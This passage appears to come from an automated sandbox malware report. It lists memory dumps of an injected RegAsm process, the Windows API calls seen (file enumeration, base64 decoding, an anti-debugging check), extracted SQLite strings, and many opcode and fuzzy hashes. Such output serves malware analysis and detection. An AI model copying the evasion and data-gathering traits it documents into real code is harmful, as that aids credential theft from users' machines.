                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: %lld %lld
                                                                                                                                                                                                                                        • API String ID: 0-3794783949
                                                                                                                                                                                                                                        • Opcode ID: 29757124f21bb1115c8d076ccc3dc45251bd2d1f281b6e694c563f48c2a76fc5
                                                                                                                                                                                                                                        • Instruction ID: 49e8d3efbbe1a9fc80b89c12949c1c477437201886b2816124c52d473c166ace
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 29757124f21bb1115c8d076ccc3dc45251bd2d1f281b6e694c563f48c2a76fc5
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3E3117767002007FE7115B68EC45F5B77BAEFC0B50F288418F6D197291EB72E9118BA6
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • API called with NULL prepared statement, xrefs: 19D61571
                                                                                                                                                                                                                                        • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19D615A2
                                                                                                                                                                                                                                        • misuse, xrefs: 19D615AC
                                                                                                                                                                                                                                        • API called with finalized prepared statement, xrefs: 19D61586
                                                                                                                                                                                                                                        • %s at line %d of [%.10s], xrefs: 19D615B1
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                                                                                                                                                                                                        • API String ID: 0-860711957
                                                                                                                                                                                                                                        • Opcode ID: 164dd048da86e60dc76ad66ccad49deb60ec7162efef2ca85c2d09585ec3bf13
                                                                                                                                                                                                                                        • Instruction ID: 5259997bf8ec7644cccd0508ee2d0a33cdc02e78df6ff6e52b4504ee9e0439db
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 164dd048da86e60dc76ad66ccad49deb60ec7162efef2ca85c2d09585ec3bf13
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 69C1F2B9E007419BE7218F34DC45B577BE8BF40354F1C452CE89A8BAA1E776E448C7A2
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9
                                                                                                                                                                                                                                          • Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
                                                                                                                                                                                                                                          • Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,014532E8,?), ref: 0041007C
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1
                                                                                                                                                                                                                                          • Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0
                                                                                                                                                                                                                                        • FindFirstFileA.KERNEL32(00000000,00427AC2,00000000,?,00427CC4,?,?,00427AC2,?,00000004), ref: 0040A6F1
                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,00427CC8), ref: 0040A73C
                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,00427CCC), ref: 0040A756
                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,01461E90,00000000,?,?,?,00427CD0,?,?,00427AC3), ref: 0040A7EB
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2567437900-0
                                                                                                                                                                                                                                        • Opcode ID: 417fddb4da55d50a135db98e9e85244356d3d6bf30ef5c3c0009510e01a1b6fd
                                                                                                                                                                                                                                        • Instruction ID: 2ea2fa0ab5ea545b4f28549334ef020faf7293f43af17f0994d5e3a1f08ac2fb
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 417fddb4da55d50a135db98e9e85244356d3d6bf30ef5c3c0009510e01a1b6fd
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 74D17170901248EACB10EBA5C9567DDBBB56F19304F50817EF945A32C2EB785B0CCBE6
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,014532E8,?), ref: 0041007C
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1
                                                                                                                                                                                                                                          • Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0
                                                                                                                                                                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00427AC6,?,?,00000011), ref: 0040AB53
                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,00427CDC), ref: 0040ABDC
                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,00427CE0), ref: 0040ABF6
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: lstrcpy$FileFindFirstlstrcatlstrlen
                                                                                                                                                                                                                                        • String ID: $$\*.*
                                                                                                                                                                                                                                        • API String ID: 1618123633-2097405073
                                                                                                                                                                                                                                        • Opcode ID: 0cc1edbcae78364b21f5275de005326cfd3953f2af5b7e73045f999bcf4a2850
                                                                                                                                                                                                                                        • Instruction ID: 9d0a2c0e34ca1c445267cdbe06f0ab8ac968f316d4e9e0d5098bc12580de8a59
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0cc1edbcae78364b21f5275de005326cfd3953f2af5b7e73045f999bcf4a2850
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9E123E71805149EACB15EBA1C951BEEBB78AF29304F1041BEF50673182DF786B4CCA69
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 02b23806638c3fb679e5b810e48090a76fe3ccd35916a6ecf043e2add5852a78
                                                                                                                                                                                                                                        • Instruction ID: f5e0b39663409b01e83ee1831e929883ad674e745b3268f1d1d798bea9b5f05b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 02b23806638c3fb679e5b810e48090a76fe3ccd35916a6ecf043e2add5852a78
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3BC18A77E183814FF7409A18EC827FB7791EBA5310F9C052EE6D6872C2E125A645C782
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 566abde35f009b9fefa4645af7fec6b7ffe2fbf91250d9bb2db3003ae005cc0b
                                                                                                                                                                                                                                        • Instruction ID: 0b51ab96ae8f439327a1e953aa8d2e26711999eff45e6783ef1a06762de6cbf6
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 566abde35f009b9fefa4645af7fec6b7ffe2fbf91250d9bb2db3003ae005cc0b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E1E12772904345AFD705DF35E881A2BB7E4BF45344F088A6DF8D9A7291E731E850CBA2
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • , xrefs: 19CE5334
                                                                                                                                                                                                                                        • REPLACE INTO '%q'.'%q_data'(id, block) VALUES(?,?), xrefs: 19CE5264
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: $REPLACE INTO '%q'.'%q_data'(id, block) VALUES(?,?)
                                                                                                                                                                                                                                        • API String ID: 0-69911113
                                                                                                                                                                                                                                        • Opcode ID: a7a646fe3eebe74ed00fb196890759e95fa865a555a05c482b4a266c461992a7
                                                                                                                                                                                                                                        • Instruction ID: 889887f7deda57ad429b3163c739f3b924060c5464200dd82fcb3f4b83f78359
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a7a646fe3eebe74ed00fb196890759e95fa865a555a05c482b4a266c461992a7
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1841B175A00241AFDB01DF29DC80B5AB7E9FF98354F094528F989A7251E772E910CBA2
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • IsDebuggerPresent.KERNEL32 ref: 0041ED3A
                                                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041ED4F
                                                                                                                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(8*d), ref: 0041ED5A
                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 0041ED76
                                                                                                                                                                                                                                        • TerminateProcess.KERNEL32(00000000), ref: 0041ED7D
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                                                        • String ID: 8*d
                                                                                                                                                                                                                                        • API String ID: 2579439406-4035773523
                                                                                                                                                                                                                                        • Opcode ID: 5ed00ec2be3fa8c0a18033fda77e17b8655e54708fff43b7fca3586c98a20a9d
                                                                                                                                                                                                                                        • Instruction ID: ba808b284e536fa33b035d48e41bedda3b5bfac0dfc64b2c7f60dbe603414694
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5ed00ec2be3fa8c0a18033fda77e17b8655e54708fff43b7fca3586c98a20a9d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4521C0BC9003069FC721DF65ECA96847BB2FB0A318FA0242AF90887670E77455C18F59
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 43830c2c14d87b3ae716c7a1980d3d4f048575f12cac28b556fe9d979f0dcba0
                                                                                                                                                                                                                                        • Instruction ID: 62c8ffb002b5858ee3f062c14bf5c91a9bd38fc5e7d1748c6916290cf3ed8a54
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 43830c2c14d87b3ae716c7a1980d3d4f048575f12cac28b556fe9d979f0dcba0
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E641E4B63143819FFB04DF14E884A66B7E4FFA8310F184469E8D2C7691D761F8548B54
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: afeb2e6e82cd6ecec4d64ca137bf5bfb11963a446339ad59eed281d4bd306b46
                                                                                                                                                                                                                                        • Instruction ID: a59c47d5673acb16cd8feea2104e262ae3f6e357f8ea25d64bb2faf3f2325273
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: afeb2e6e82cd6ecec4d64ca137bf5bfb11963a446339ad59eed281d4bd306b46
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4D31E7397013019FD710CF18E885EA6B3F6FF84325B194579EA868B262DB22FC51CB90
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • memset.MSVCRT ref: 00409359
                                                                                                                                                                                                                                        • lstrlen.KERNEL32(004096B6,00000001,?,00001FA0,00000000,00000000,?,004096B6), ref: 00409376
                                                                                                                                                                                                                                        • CryptStringToBinaryA.CRYPT32(004096B6,00000000,?,004096B6), ref: 0040937E
                                                                                                                                                                                                                                        • memcpy.MSVCRT ref: 004093F1
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(00427AA7,00427AAB), ref: 0040942D
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(00427AA7,00427AAE), ref: 0040944F
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
